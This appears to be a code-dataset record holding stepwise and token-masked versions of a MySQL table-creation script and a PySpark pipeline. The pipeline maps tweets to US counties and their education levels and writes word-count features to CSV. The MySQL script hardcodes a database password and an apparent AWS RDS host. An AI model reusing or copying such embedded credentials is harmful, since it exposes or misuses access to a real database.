if err.errno == errorcode.ER_TABLE_EXISTS_ERROR:\n print('already exists.')\n else:\n print(err.msg)\n else:\n print('OK')\ncursor.close()\ncnx.close()\n",
"step-4": "import mysql.connector\nfrom mysql.connector import errorcode\nDB_NAME = 'PieDB'\nTABLES = {}\nTABLES['lemonpie'] = (\n 'CREATE TABLE `lemonpie` ( `id` int NOT NULL AUTO_INCREMENT, `tweet_id` bigint NOT NULL, `username` varchar(32) NOT NULL, `geo_lat` float(53) NOT NULL, `geo_long` float(53) NOT NULL, `text` varchar(255) NOT NULL, `timestamp` datetime NOT NULL, PRIMARY KEY (`id`)) ENGINE=InnoDB'\n )\nconfig = {'user': 'piemaster', 'password': 'piemaster123', 'host':\n 'piedb.chhtgdmxqekc.us-east-1.rds.amazonaws.com', 'database': 'PieDB',\n 'raise_on_warnings': True}\ncnx = mysql.connector.connect(**config)\ncursor = cnx.cursor()\n\n\ndef create_database(cursor):\n try:\n cursor.execute(\"CREATE DATABASE {} DEFAULT CHARACTER SET 'utf8'\".\n format(DB_NAME))\n except mysql.connector.Error as err:\n print('Failed creating database: {}'.format(err))\n exit(1)\n\n\ntry:\n cnx.database = DB_NAME\nexcept mysql.connector.Error as err:\n if err.errno == errorcode.ER_BAD_DB_ERROR:\n create_database(cursor)\n cnx.database = DB_NAME\n else:\n print(err)\n exit(1)\nfor name, ddl in TABLES.iteritems():\n try:\n print('Creating table {}: '.format(name))\n cursor.execute(ddl)\n except mysql.connector.Error as err:\n if err.errno == errorcode.ER_TABLE_EXISTS_ERROR:\n print('already exists.')\n else:\n print(err.msg)\n else:\n print('OK')\ncursor.close()\ncnx.close()\n",
"step-5": "import mysql.connector\nfrom mysql.connector import errorcode\n\nDB_NAME = 'PieDB'\n\nTABLES = {}\n# TABLES['pietweets'] = (\n# \t\"CREATE TABLE `pietweets` (\"\n# \t\" `id` int NOT NULL AUTO_INCREMENT,\"\t\t\n# \t\" `tweet_id` bigint NOT NULL,\"\n# \t\" `username` varchar(32) NOT NULL,\"\n# \t\" `geo_lat` float(53) NOT NULL,\"\n# \t\" `geo_long` float(53) NOT NULL,\"\n# \t\" `text` varchar(255) NOT NULL,\"\n# \t\" `timestamp` datetime NOT NULL,\"\n# \t\" PRIMARY KEY (`id`)\"\n# \t\") ENGINE=InnoDB\")\nTABLES['lemonpie'] = (\n \"CREATE TABLE `lemonpie` (\"\n \" `id` int NOT NULL AUTO_INCREMENT,\" \n \" `tweet_id` bigint NOT NULL,\"\n \" `username` varchar(32) NOT NULL,\"\n \" `geo_lat` float(53) NOT NULL,\"\n \" `geo_long` float(53) NOT NULL,\"\n \" `text` varchar(255) NOT NULL,\"\n \" `timestamp` datetime NOT NULL,\"\n \" PRIMARY KEY (`id`)\"\n \") ENGINE=InnoDB\")\n\n# DB credentials\nconfig = {\n 'user': 'piemaster',\n 'password': 'piemaster123',\n 'host': 'piedb.chhtgdmxqekc.us-east-1.rds.amazonaws.com',\n 'database': 'PieDB',\n 'raise_on_warnings': True,\n}\n\n# establish connection with DB config credentials\ncnx = mysql.connector.connect(**config)\ncursor = cnx.cursor()\n\ndef create_database(cursor):\n try:\n cursor.execute(\n \"CREATE DATABASE {} DEFAULT CHARACTER SET 'utf8'\".format(DB_NAME))\n except mysql.connector.Error as err:\n print(\"Failed creating database: {}\".format(err))\n exit(1)\n\n# try connecting to designated DB, if not exist - create this DB\ntry:\n cnx.database = DB_NAME \nexcept mysql.connector.Error as err:\n if err.errno == errorcode.ER_BAD_DB_ERROR:\n create_database(cursor)\n cnx.database = DB_NAME\n else:\n print(err)\n exit(1)\n\n# iterate through TABLES and create each table\nfor name, ddl in TABLES.iteritems():\n try:\n print(\"Creating table {}: \".format(name))\n cursor.execute(ddl)\n except mysql.connector.Error as err:\n if err.errno == errorcode.ER_TABLE_EXISTS_ERROR:\n print(\"already exists.\")\n else:\n print(err.msg)\n else:\n print(\"OK\")\n\n# closing db connection\ncursor.close()\ncnx.close()\n\n\n\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
class WordsSetAccumulatorParam(AccumulatorParam):
def zero(self, v):
return set()
def addInPlace(self, acc1, acc2):
return acc1.union(acc2)
class WordsDictAccumulatorParam(AccumulatorParam):
def zero(self, v):
return dict()
def addInPlace(self, acc1, acc2):
for key in acc2.keys():
try:
acc1[key] += acc2[key]
except:
acc1[key] = acc2[key]
return acc1
<|reserved_special_token_0|>
def mapToCounty(place, location, coordinates):
if place:
place = place.split(',')[0].lower()
try:
if area_dict[place]:
return area_dict[place]
except:
None
if location:
location = location.split(',')[0].lower()
try:
if area_dict[location]:
return area_dict[location]
except:
None
if coordinates:
closestLoc = spatial.KDTree(latlon).query(coordinates, k=1,
distance_upper_bound=9)[1]
try:
closest = latlon[closestLoc]
except:
return None
if coord_dict[closest[0], closest[1]]:
county_k = coord_dict[closest[0], closest[1]]
return county_dict[county_k]
return None
def load_bz2_json(filename):
if '.bz2' in filename:
with bz2.open(filename, 'rt') as f:
lines = str(f.read()).split('\n')
else:
with open(filename) as f:
lines = str(f.readlines()).split('\\n')
num_lines = len(lines)
tweets = []
for line in lines:
try:
if line == '':
num_lines -= 1
continue
tweets.append(json.loads(line))
except:
continue
return tweets
<|reserved_special_token_0|>
def parseTweetText(tweet):
text = tweet['tweet_text']
text = httpPattern.sub('', text)
words = wordPattern.findall(text)
tweet['tweet_text'] = words
return tweet
<|reserved_special_token_0|>
def genVocabulary(x):
global vocabulary
arr = x[1]
if isinstance(arr, dict):
return x
else:
wordDict = dict()
for w in arr:
vocabulary += {w: 1}
try:
wordDict[w] += 1
except:
wordDict[w] = 1
x = x[0], wordDict
return x
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class WordsSetAccumulatorParam(AccumulatorParam):
def zero(self, v):
return set()
def addInPlace(self, acc1, acc2):
return acc1.union(acc2)
class WordsDictAccumulatorParam(AccumulatorParam):
def zero(self, v):
return dict()
def addInPlace(self, acc1, acc2):
for key in acc2.keys():
try:
acc1[key] += acc2[key]
except:
acc1[key] = acc2[key]
return acc1
<|reserved_special_token_0|>
def mapToCounty(place, location, coordinates):
if place:
place = place.split(',')[0].lower()
try:
if area_dict[place]:
return area_dict[place]
except:
None
if location:
location = location.split(',')[0].lower()
try:
if area_dict[location]:
return area_dict[location]
except:
None
if coordinates:
closestLoc = spatial.KDTree(latlon).query(coordinates, k=1,
distance_upper_bound=9)[1]
try:
closest = latlon[closestLoc]
except:
return None
if coord_dict[closest[0], closest[1]]:
county_k = coord_dict[closest[0], closest[1]]
return county_dict[county_k]
return None
def load_bz2_json(filename):
if '.bz2' in filename:
with bz2.open(filename, 'rt') as f:
lines = str(f.read()).split('\n')
else:
with open(filename) as f:
lines = str(f.readlines()).split('\\n')
num_lines = len(lines)
tweets = []
for line in lines:
try:
if line == '':
num_lines -= 1
continue
tweets.append(json.loads(line))
except:
continue
return tweets
def load_tweet(tweet, tweets_saved):
try:
tweet_text = tweet['text']
tweet_user_id = tweet['user']['id']
tweet_user_location = tweet['user']['location']
tweet_user_lang = tweet['user']['lang']
try:
tweet_coordinates = tweet['coordinates']['coordinates']
except:
tweet_coordinates = None
try:
tweet_place = tweet['place']['full_name']
except:
tweet_place = None
map_to_county = mapToCounty(tweet_place, tweet_user_location,
tweet_coordinates)
if map_to_county:
tweet_county = int(map_to_county[0])
tweet_education_level = tuple(map_to_county[1:])
else:
tweet_county = None
tweet_education_level = None
except KeyError:
return {}, tweets_saved
data = {'tweet_text': tweet_text, 'tweet_user_id': tweet_user_id,
'tweet_user_lang': tweet_user_lang, 'tweet_county': tweet_county,
'tweet_education_level': tweet_education_level}
tweets_saved += 1
return data, tweets_saved
<|reserved_special_token_0|>
def parseTweetText(tweet):
text = tweet['tweet_text']
text = httpPattern.sub('', text)
words = wordPattern.findall(text)
tweet['tweet_text'] = words
return tweet
<|reserved_special_token_0|>
def genVocabulary(x):
global vocabulary
arr = x[1]
if isinstance(arr, dict):
return x
else:
wordDict = dict()
for w in arr:
vocabulary += {w: 1}
try:
wordDict[w] += 1
except:
wordDict[w] = 1
x = x[0], wordDict
return x
def handle_file(filename):
tweets = load_bz2_json(filename)
tweet_dicts = []
tweets_saved = 0
for tweet in tweets:
tweet_dict, tweets_saved = load_tweet(tweet, tweets_saved)
if tweet_dict:
tweet_dicts.append(tweet_dict)
return tweet_dicts
def filterTweets(tweet):
text = tweet['tweet_text']
lang = tweet['tweet_user_lang']
education = tweet['tweet_education_level']
county = tweet['tweet_county']
if not text or text == []:
return False
if lang != 'en':
return False
if education is None or county is None:
return False
return True
<|reserved_special_token_0|>
def main():
fileNames = sc.parallelize([])
for root, dirs, files in os.walk(CACHE_DIR):
subFileNames = sc.parallelize(files).map(lambda file: os.path.join(
root, file))
fileNames = sc.union([fileNames, subFileNames])
tweetsRdd = fileNames.flatMap(lambda file: handle_file(file)).filter(lambda
tweet: filterTweets(tweet))
wordsRdd = tweetsRdd.map(lambda tweet: parseTweetText(tweet)).filter(lambda
tweet: filterTweets(tweet))
countyEduRdd = wordsRdd.map(lambda tweet: ((tweet['tweet_county'],
tweet['tweet_education_level']), tweet['tweet_text']))
countyEduRdd = countyEduRdd.reduceByKey(lambda x, y: combineWordLists(x, y)
).map(lambda z: genVocabulary(z))
tempRes = countyEduRdd.collect()
print(len(tempRes))
vocabRDD = sc.parallelize(vocabulary.value.items())
vocabRDD = vocabRDD.filter(lambda voc: True if voc[1] > 1 else False)
vocab = sorted(vocabRDD.collect(), key=operator.itemgetter(1), reverse=True
)
print('vocabulary size = ', len(vocab))
storeResults(tempRes, vocab)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class WordsSetAccumulatorParam(AccumulatorParam):
def zero(self, v):
return set()
def addInPlace(self, acc1, acc2):
return acc1.union(acc2)
class WordsDictAccumulatorParam(AccumulatorParam):
def zero(self, v):
return dict()
def addInPlace(self, acc1, acc2):
for key in acc2.keys():
try:
acc1[key] += acc2[key]
except:
acc1[key] = acc2[key]
return acc1
<|reserved_special_token_0|>
def mapToCounty(place, location, coordinates):
if place:
place = place.split(',')[0].lower()
try:
if area_dict[place]:
return area_dict[place]
except:
None
if location:
location = location.split(',')[0].lower()
try:
if area_dict[location]:
return area_dict[location]
except:
None
if coordinates:
closestLoc = spatial.KDTree(latlon).query(coordinates, k=1,
distance_upper_bound=9)[1]
try:
closest = latlon[closestLoc]
except:
return None
if coord_dict[closest[0], closest[1]]:
county_k = coord_dict[closest[0], closest[1]]
return county_dict[county_k]
return None
def load_bz2_json(filename):
if '.bz2' in filename:
with bz2.open(filename, 'rt') as f:
lines = str(f.read()).split('\n')
else:
with open(filename) as f:
lines = str(f.readlines()).split('\\n')
num_lines = len(lines)
tweets = []
for line in lines:
try:
if line == '':
num_lines -= 1
continue
tweets.append(json.loads(line))
except:
continue
return tweets
def load_tweet(tweet, tweets_saved):
try:
tweet_text = tweet['text']
tweet_user_id = tweet['user']['id']
tweet_user_location = tweet['user']['location']
tweet_user_lang = tweet['user']['lang']
try:
tweet_coordinates = tweet['coordinates']['coordinates']
except:
tweet_coordinates = None
try:
tweet_place = tweet['place']['full_name']
except:
tweet_place = None
map_to_county = mapToCounty(tweet_place, tweet_user_location,
tweet_coordinates)
if map_to_county:
tweet_county = int(map_to_county[0])
tweet_education_level = tuple(map_to_county[1:])
else:
tweet_county = None
tweet_education_level = None
except KeyError:
return {}, tweets_saved
data = {'tweet_text': tweet_text, 'tweet_user_id': tweet_user_id,
'tweet_user_lang': tweet_user_lang, 'tweet_county': tweet_county,
'tweet_education_level': tweet_education_level}
tweets_saved += 1
return data, tweets_saved
<|reserved_special_token_0|>
def parseTweetText(tweet):
text = tweet['tweet_text']
text = httpPattern.sub('', text)
words = wordPattern.findall(text)
tweet['tweet_text'] = words
return tweet
def combineWordLists(x, y):
global vocabulary
if isinstance(x, dict):
wordDict = x
xny = y
else:
wordDict = dict()
xny = x + y
for w in xny:
vocabulary += {w: 1}
try:
wordDict[w] += 1
except:
wordDict[w] = 1
return wordDict
def genVocabulary(x):
global vocabulary
arr = x[1]
if isinstance(arr, dict):
return x
else:
wordDict = dict()
for w in arr:
vocabulary += {w: 1}
try:
wordDict[w] += 1
except:
wordDict[w] = 1
x = x[0], wordDict
return x
def handle_file(filename):
tweets = load_bz2_json(filename)
tweet_dicts = []
tweets_saved = 0
for tweet in tweets:
tweet_dict, tweets_saved = load_tweet(tweet, tweets_saved)
if tweet_dict:
tweet_dicts.append(tweet_dict)
return tweet_dicts
def filterTweets(tweet):
text = tweet['tweet_text']
lang = tweet['tweet_user_lang']
education = tweet['tweet_education_level']
county = tweet['tweet_county']
if not text or text == []:
return False
if lang != 'en':
return False
if education is None or county is None:
return False
return True
<|reserved_special_token_0|>
def main():
fileNames = sc.parallelize([])
for root, dirs, files in os.walk(CACHE_DIR):
subFileNames = sc.parallelize(files).map(lambda file: os.path.join(
root, file))
fileNames = sc.union([fileNames, subFileNames])
tweetsRdd = fileNames.flatMap(lambda file: handle_file(file)).filter(lambda
tweet: filterTweets(tweet))
wordsRdd = tweetsRdd.map(lambda tweet: parseTweetText(tweet)).filter(lambda
tweet: filterTweets(tweet))
countyEduRdd = wordsRdd.map(lambda tweet: ((tweet['tweet_county'],
tweet['tweet_education_level']), tweet['tweet_text']))
countyEduRdd = countyEduRdd.reduceByKey(lambda x, y: combineWordLists(x, y)
).map(lambda z: genVocabulary(z))
tempRes = countyEduRdd.collect()
print(len(tempRes))
vocabRDD = sc.parallelize(vocabulary.value.items())
vocabRDD = vocabRDD.filter(lambda voc: True if voc[1] > 1 else False)
vocab = sorted(vocabRDD.collect(), key=operator.itemgetter(1), reverse=True
)
print('vocabulary size = ', len(vocab))
storeResults(tempRes, vocab)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
CACHE_DIR = 'D:\\TwitterDatastream\\PYTHONCACHE_SMALL'
EDU_DATA = 'merged.csv'
TRAIN_FEAT_CSV = 'testFeat.csv'
TRAIN_LABS_CSV = 'testLabs.csv'
TRAIN_FEAT_LABS_CSV = 'testFeatLabs.csv'
FEATURE_NAMES_CSV = 'featureNames.csv'
sc = SparkContext('local', 'test')
class WordsSetAccumulatorParam(AccumulatorParam):
def zero(self, v):
return set()
def addInPlace(self, acc1, acc2):
return acc1.union(acc2)
class WordsDictAccumulatorParam(AccumulatorParam):
def zero(self, v):
return dict()
def addInPlace(self, acc1, acc2):
for key in acc2.keys():
try:
acc1[key] += acc2[key]
except:
acc1[key] = acc2[key]
return acc1
vocabulary = sc.accumulator(dict(), WordsDictAccumulatorParam())
location_data = pd.read_csv(EDU_DATA)
area_dict = dict(zip(location_data['city'], location_data[['fips',
'without_hsd', 'with_hsd', 'somecollege', 'bachelors']].values.tolist()))
county_dict = dict(zip(location_data['county'], location_data[['fips',
'without_hsd', 'with_hsd', 'somecollege', 'bachelors']].values.tolist()))
coord_dict = {tuple(x[:2]): x[2] for x in location_data[['lat', 'lng',
'county']].values}
latlon = list()
for index, row in location_data.iterrows():
latlon.append([location_data['lat'][index], location_data['lng'][index]])
latlon = np.array(latlon)
latlonKDT = spatial.KDTree(latlon)
def mapToCounty(place, location, coordinates):
if place:
place = place.split(',')[0].lower()
try:
if area_dict[place]:
return area_dict[place]
except:
None
if location:
location = location.split(',')[0].lower()
try:
if area_dict[location]:
return area_dict[location]
except:
None
if coordinates:
closestLoc = spatial.KDTree(latlon).query(coordinates, k=1,
distance_upper_bound=9)[1]
try:
closest = latlon[closestLoc]
except:
return None
if coord_dict[closest[0], closest[1]]:
county_k = coord_dict[closest[0], closest[1]]
return county_dict[county_k]
return None
def load_bz2_json(filename):
if '.bz2' in filename:
with bz2.open(filename, 'rt') as f:
lines = str(f.read()).split('\n')
else:
with open(filename) as f:
lines = str(f.readlines()).split('\\n')
num_lines = len(lines)
tweets = []
for line in lines:
try:
if line == '':
num_lines -= 1
continue
tweets.append(json.loads(line))
except:
continue
return tweets
def load_tweet(tweet, tweets_saved):
try:
tweet_text = tweet['text']
tweet_user_id = tweet['user']['id']
tweet_user_location = tweet['user']['location']
tweet_user_lang = tweet['user']['lang']
try:
tweet_coordinates = tweet['coordinates']['coordinates']
except:
tweet_coordinates = None
try:
tweet_place = tweet['place']['full_name']
except:
tweet_place = None
map_to_county = mapToCounty(tweet_place, tweet_user_location,
tweet_coordinates)
if map_to_county:
tweet_county = int(map_to_county[0])
tweet_education_level = tuple(map_to_county[1:])
else:
tweet_county = None
tweet_education_level = None
except KeyError:
return {}, tweets_saved
data = {'tweet_text': tweet_text, 'tweet_user_id': tweet_user_id,
'tweet_user_lang': tweet_user_lang, 'tweet_county': tweet_county,
'tweet_education_level': tweet_education_level}
tweets_saved += 1
return data, tweets_saved
wordPattern = re.compile('\\b[A-Za-z_.,!\\"\']+\\b', re.IGNORECASE)
httpPattern = re.compile('^RT |@\\S+|http\\S+', re.IGNORECASE)
def parseTweetText(tweet):
text = tweet['tweet_text']
text = httpPattern.sub('', text)
words = wordPattern.findall(text)
tweet['tweet_text'] = words
return tweet
def combineWordLists(x, y):
global vocabulary
if isinstance(x, dict):
wordDict = x
xny = y
else:
wordDict = dict()
xny = x + y
for w in xny:
vocabulary += {w: 1}
try:
wordDict[w] += 1
except:
wordDict[w] = 1
return wordDict
def genVocabulary(x):
global vocabulary
arr = x[1]
if isinstance(arr, dict):
return x
else:
wordDict = dict()
for w in arr:
vocabulary += {w: 1}
try:
wordDict[w] += 1
except:
wordDict[w] = 1
x = x[0], wordDict
return x
def handle_file(filename):
tweets = load_bz2_json(filename)
tweet_dicts = []
tweets_saved = 0
for tweet in tweets:
tweet_dict, tweets_saved = load_tweet(tweet, tweets_saved)
if tweet_dict:
tweet_dicts.append(tweet_dict)
return tweet_dicts
def filterTweets(tweet):
text = tweet['tweet_text']
lang = tweet['tweet_user_lang']
education = tweet['tweet_education_level']
county = tweet['tweet_county']
if not text or text == []:
return False
if lang != 'en':
return False
if education is None or county is None:
return False
return True
def storeResults(traindata, vocab):
columnIdx = {vocab[voc][0]: voc for voc in range(len(vocab))}
with open(TRAIN_FEAT_CSV, 'wt') as trainFeatFile, open(TRAIN_LABS_CSV, 'wt'
) as trainLabsFile, open(TRAIN_FEAT_LABS_CSV, 'wt'
) as trainFeatLabsFile:
trainFeatwriter = csv.writer(trainFeatFile, delimiter=',',
quotechar='|', quoting=csv.QUOTE_MINIMAL, lineterminator='\n')
trainLabswriter = csv.writer(trainLabsFile, delimiter=',',
quotechar='|', quoting=csv.QUOTE_MINIMAL, lineterminator='\n')
trainFeatLabswriter = csv.writer(trainFeatLabsFile, delimiter=',',
quotechar='|', quoting=csv.QUOTE_MINIMAL, lineterminator='\n')
for row in traindata:
edu = row[0][1]
featDict = row[1]
feats = np.zeros(len(columnIdx))
for key in featDict:
try:
feats[columnIdx[key]] = featDict[key]
except:
continue
trainFeatwriter.writerow(feats.tolist())
trainLabswriter.writerow(list(edu))
combList = list(edu) + feats.tolist()
trainFeatLabswriter.writerow(combList)
def main():
fileNames = sc.parallelize([])
for root, dirs, files in os.walk(CACHE_DIR):
subFileNames = sc.parallelize(files).map(lambda file: os.path.join(
root, file))
fileNames = sc.union([fileNames, subFileNames])
tweetsRdd = fileNames.flatMap(lambda file: handle_file(file)).filter(lambda
tweet: filterTweets(tweet))
wordsRdd = tweetsRdd.map(lambda tweet: parseTweetText(tweet)).filter(lambda
tweet: filterTweets(tweet))
countyEduRdd = wordsRdd.map(lambda tweet: ((tweet['tweet_county'],
tweet['tweet_education_level']), tweet['tweet_text']))
countyEduRdd = countyEduRdd.reduceByKey(lambda x, y: combineWordLists(x, y)
).map(lambda z: genVocabulary(z))
tempRes = countyEduRdd.collect()
print(len(tempRes))
vocabRDD = sc.parallelize(vocabulary.value.items())
vocabRDD = vocabRDD.filter(lambda voc: True if voc[1] > 1 else False)
vocab = sorted(vocabRDD.collect(), key=operator.itemgetter(1), reverse=True
)
print('vocabulary size = ', len(vocab))
storeResults(tempRes, vocab)
if __name__ == '__main__':
main()
<|reserved_special_token_1|>
import bz2
import json
import os
from pyspark.context import SparkContext
from pyspark.accumulators import AccumulatorParam
import numpy as np
from scipy import spatial
import pandas as pd
import re
import operator
import csv
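# Input locations (cached tweet dumps, census CSV) and the CSV files this job writes out.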
CACHE_DIR = "D:\TwitterDatastream\PYTHONCACHE_SMALL"
EDU_DATA = 'merged.csv'
TRAIN_FEAT_CSV = 'testFeat.csv'
TRAIN_LABS_CSV = 'testLabs.csv'
TRAIN_FEAT_LABS_CSV = 'testFeatLabs.csv'
FEATURE_NAMES_CSV = 'featureNames.csv'
sc = SparkContext('local', 'test')
# location_data = pd.read_csv('new_merged.csv')
class WordsSetAccumulatorParam(AccumulatorParam):
def zero(self, v):
return set()
def addInPlace(self, acc1, acc2):
return acc1.union(acc2)
# Accumulator that merges per-partition word-count dictionaries into one global dict
class WordsDictAccumulatorParam(AccumulatorParam):
def zero(self, v):
return dict()
def addInPlace(self, acc1, acc2):
for key in acc2.keys():
try:
acc1[key] += acc2[key]
except:
acc1[key] = acc2[key]
return acc1
# An accumulator used to build the word vocabulary
# vocabulary = sc.accumulator(set(), WordsSetAccumulatorParam())
vocabulary = sc.accumulator(dict(), WordsDictAccumulatorParam())
# load Education census data
location_data = pd.read_csv(EDU_DATA)
area_dict = dict(zip(location_data['city'], location_data[['fips', 'without_hsd','with_hsd', 'somecollege', 'bachelors']].values.tolist()))
county_dict = dict(zip(location_data['county'], location_data[['fips', 'without_hsd','with_hsd', 'somecollege', 'bachelors']].values.tolist()))
coord_dict = {tuple(x[:2]):x[2] for x in location_data[['lat', 'lng', 'county']].values}
# create a KD tree of known county center locations to be used to map a tweet coordinate to a county
latlon = list()
for index, row in location_data.iterrows():
latlon.append([location_data['lat'][index], location_data['lng'][index]])
latlon = np.array(latlon)
latlonKDT = spatial.KDTree(latlon)
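# Prebuilt KD-tree over county centroids; mapToCounty queries it to snap raw coordinates to a county.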
# function to map place, location or coordinate data from a tweet to a FIPS code of the county and the education
# level distribution of that county
def mapToCounty(place, location, coordinates):
# coordr_dict = {tuple(x[:2]):x[2] for x in location_data[['lat_r', 'lng_r', 'county']].values}
if place:
place = (place.split(",")[0]).lower()
# country = (place.split(",")[1]).lower()
try:
if area_dict[place]: return area_dict[place]
        except: pass
if location:
location = (location.split(",")[0]).lower()
try:
if area_dict[location]: return area_dict[location]
        except: pass
if coordinates:
        closestLoc = latlonKDT.query(coordinates, k=1, distance_upper_bound=9)[1]  # reuse the prebuilt tree instead of rebuilding it per tweet
try:
closest = latlon[closestLoc]
except:
return None
# closest = spatial.KDTree(latlon).query(coordinates, k=1, distance_upper_bound=9)
# if closest[0] != float('inf') and latlon[closest[1]][0] != 0. and latlon[closest[1]][1] != 0.:
# print(coordinates, closest, latlon[closest[1]])
# return closest[0], closest[1]
        county_k = coord_dict.get((closest[0], closest[1]))  # .get avoids a KeyError for unknown centroids
        if county_k:
            return county_dict[county_k]
return None
# Load Tweets from each file (.bz2 or .json)
def load_bz2_json(filename):
if '.bz2' in filename:
with bz2.open(filename, 'rt') as f:
lines = str(f.read()).split('\n')
else:
with open(filename) as f:
lines = str(f.readlines()).split('\\n')
num_lines = len(lines)
tweets = []
for line in lines:
try:
if line == "":
num_lines -= 1
continue
tweets.append(json.loads(line))
except:
continue
# print(filename, len(tweets))
return tweets
# strip each tweet object and keep only what's necessary in a dictionary
def load_tweet(tweet, tweets_saved):
try:
# tweet_id = tweet['id']
tweet_text = tweet['text']
tweet_user_id = tweet['user']['id']
tweet_user_location = tweet['user']['location']
tweet_user_lang = tweet['user']['lang']
try: tweet_coordinates = tweet['coordinates']['coordinates']
except: tweet_coordinates = None
try: tweet_place = tweet['place']['full_name']
except: tweet_place = None
map_to_county = mapToCounty(tweet_place, tweet_user_location, tweet_coordinates)
if map_to_county:
tweet_county = int(map_to_county[0])
tweet_education_level = tuple(map_to_county[1:])
else:
tweet_county = None
tweet_education_level = None
# created_at = tweet['created_at']
except KeyError:
return {}, tweets_saved
data = {'tweet_text': tweet_text,
# 'tweet_id': tweet_id,
'tweet_user_id': tweet_user_id,
# 'tweet_user_location': tweet_user_location,
'tweet_user_lang': tweet_user_lang,
# 'tweet_place': tweet_place,
# 'tweet_coordinates': tweet_coordinates,
'tweet_county': tweet_county,
'tweet_education_level': tweet_education_level}
# 'date_loaded': datetime.datetime.now(),
# 'tweet_json': json.dumps(tweet)}
tweets_saved += 1
return data, tweets_saved
wordPattern = re.compile(r"\b[A-Za-z_.,!\"']+\b", re.IGNORECASE)
httpPattern = re.compile(r"^RT |@\S+|http\S+", re.IGNORECASE)
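# Worked example (illustrative): for "RT @user check https://t.co/x nice!",
# httpPattern strips the retweet marker, mention and URL, leaving
# " check  nice!", from which wordPattern extracts ['check', 'nice'].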
# Function that uses regular expressions to remove unwanted characters, URLs, etc. and split tweet_text
# into meaningful words
def parseTweetText(tweet):
text = tweet['tweet_text']
text = httpPattern.sub(r"", text)
words = wordPattern.findall(text)
tweet['tweet_text'] = words #list(zip(words, [1]*len(words)))
# print(tweet)
return tweet
# function to combine word lists and count frequency of each word locally
def combineWordLists(x, y):
global vocabulary
if isinstance(x, dict):
wordDict = x
xny = y
else:
wordDict = dict()
xny = x + y
for w in xny:
# vocabulary +=[w]
vocabulary += {w: 1}
try:
wordDict[w] += 1
except:
wordDict[w] = 1
return wordDict
# function to add words to the vocabulary and count frequency of each word globally
def genVocabulary(x):
global vocabulary
arr = x[1]
if isinstance(arr, dict):
return x
else:
wordDict = dict()
for w in arr:
vocabulary += {w: 1}
try:
wordDict[w] += 1
except:
wordDict[w] = 1
x = (x[0],wordDict)
return x
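# Illustrative call (hypothetical county/education key):
# genVocabulary(((6037, (9.8, 20.1, 29.3, 40.8)), ['la', 'la', 'sun']))
# -> ((6037, (9.8, 20.1, 29.3, 40.8)), {'la': 2, 'sun': 1}),
# while the global vocabulary accumulator is bumped for 'la' and 'sun'.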
# read tweets from each file and parse them into dictionaries with only relevant data
def handle_file(filename):
tweets = load_bz2_json(filename)
tweet_dicts = []
tweets_saved = 0
for tweet in tweets:
tweet_dict, tweets_saved = load_tweet(tweet, tweets_saved)
if tweet_dict:
tweet_dicts.append(tweet_dict)
return tweet_dicts
# filter only tweets that have text and resolved county/education data and are written in English
def filterTweets(tweet):
# location = tweet['tweet_user_location']
# coordinates = tweet['tweet_place']
# place = tweet['tweet_coordinates']
text = tweet['tweet_text']
lang = tweet['tweet_user_lang']
education = tweet['tweet_education_level']
county = tweet['tweet_county']
# if location or coordinates or place: ret = True
# else: return False
if not text or text == []: return False
if lang != 'en': return False
if education is None or county is None: return False
return True
# store all data into CSV files
def storeResults(traindata, vocab):
columnIdx = {vocab[voc][0]: voc for voc in range(len(vocab))}
with open(TRAIN_FEAT_CSV, 'wt') as trainFeatFile, open(TRAIN_LABS_CSV, 'wt') as trainLabsFile, open(TRAIN_FEAT_LABS_CSV, 'wt') as trainFeatLabsFile:
trainFeatwriter = csv.writer(trainFeatFile, delimiter=',',quotechar='|', quoting=csv.QUOTE_MINIMAL, lineterminator='\n')
trainLabswriter = csv.writer(trainLabsFile, delimiter=',',quotechar='|', quoting=csv.QUOTE_MINIMAL, lineterminator='\n')
trainFeatLabswriter = csv.writer(trainFeatLabsFile, delimiter=',',quotechar='|', quoting=csv.QUOTE_MINIMAL, lineterminator='\n')
for row in traindata:
edu = row[0][1]
featDict = row[1]
feats = np.zeros(len(columnIdx))
for key in featDict:
try:
feats[columnIdx[key]] = featDict[key]
except:
continue
trainFeatwriter.writerow(feats.tolist())
trainLabswriter.writerow(list(edu))
combList = list(edu) + feats.tolist()
trainFeatLabswriter.writerow(combList)
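# Each trainFeatLabs row is the four education-level shares
# (without_hsd, with_hsd, somecollege, bachelors) followed by the county's
# word-count vector aligned to the sorted vocabulary columns.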
# main function with all the Spark code
def main():
fileNames = sc.parallelize([])
# generate a list of all files in the data directory
for root, dirs, files in os.walk(CACHE_DIR):
subFileNames = sc.parallelize(files).map(lambda file: os.path.join(root, file))
fileNames = sc.union([fileNames, subFileNames])
# load all tweets and filter
tweetsRdd = fileNames.flatMap(lambda file: handle_file(file)).filter(lambda tweet: filterTweets(tweet))
# clean, parse and filter tweets and map each to county and education level
wordsRdd = tweetsRdd.map(lambda tweet: parseTweetText(tweet)).filter(lambda tweet: filterTweets(tweet))
# set county and education level as the key for each tweet and keep only the text as value
countyEduRdd = wordsRdd.map(lambda tweet: ((tweet['tweet_county'], tweet['tweet_education_level']), tweet['tweet_text']))
# aggregate tweets based on county level and generate vocabulary
countyEduRdd = countyEduRdd.reduceByKey(lambda x, y: combineWordLists(x, y)).map(lambda z: genVocabulary(z))
tempRes = countyEduRdd.collect()
# print(tempRes)
print(len(tempRes))
vocabRDD = sc.parallelize(vocabulary.value.items())
# filter out words that only occur once in the entire dataset (mainly noise)
vocabRDD = vocabRDD.filter(lambda voc: True if voc[1] > 1 else False)
# print("vocabulary = ", sorted(vocabulary.value.items(), key=operator.itemgetter(1)))
vocab = sorted(vocabRDD.collect(), key=operator.itemgetter(1), reverse=True)
# print("vocabulary = ", vocab)
print("vocabulary size = ", len(vocab))
storeResults(tempRes, vocab)
if __name__ == "__main__":
main()
|
flexible
|
{
"blob_id": "ee58ed68d2f3c43f9611f6c6e4cd2b99adcb43d2",
"index": 2616,
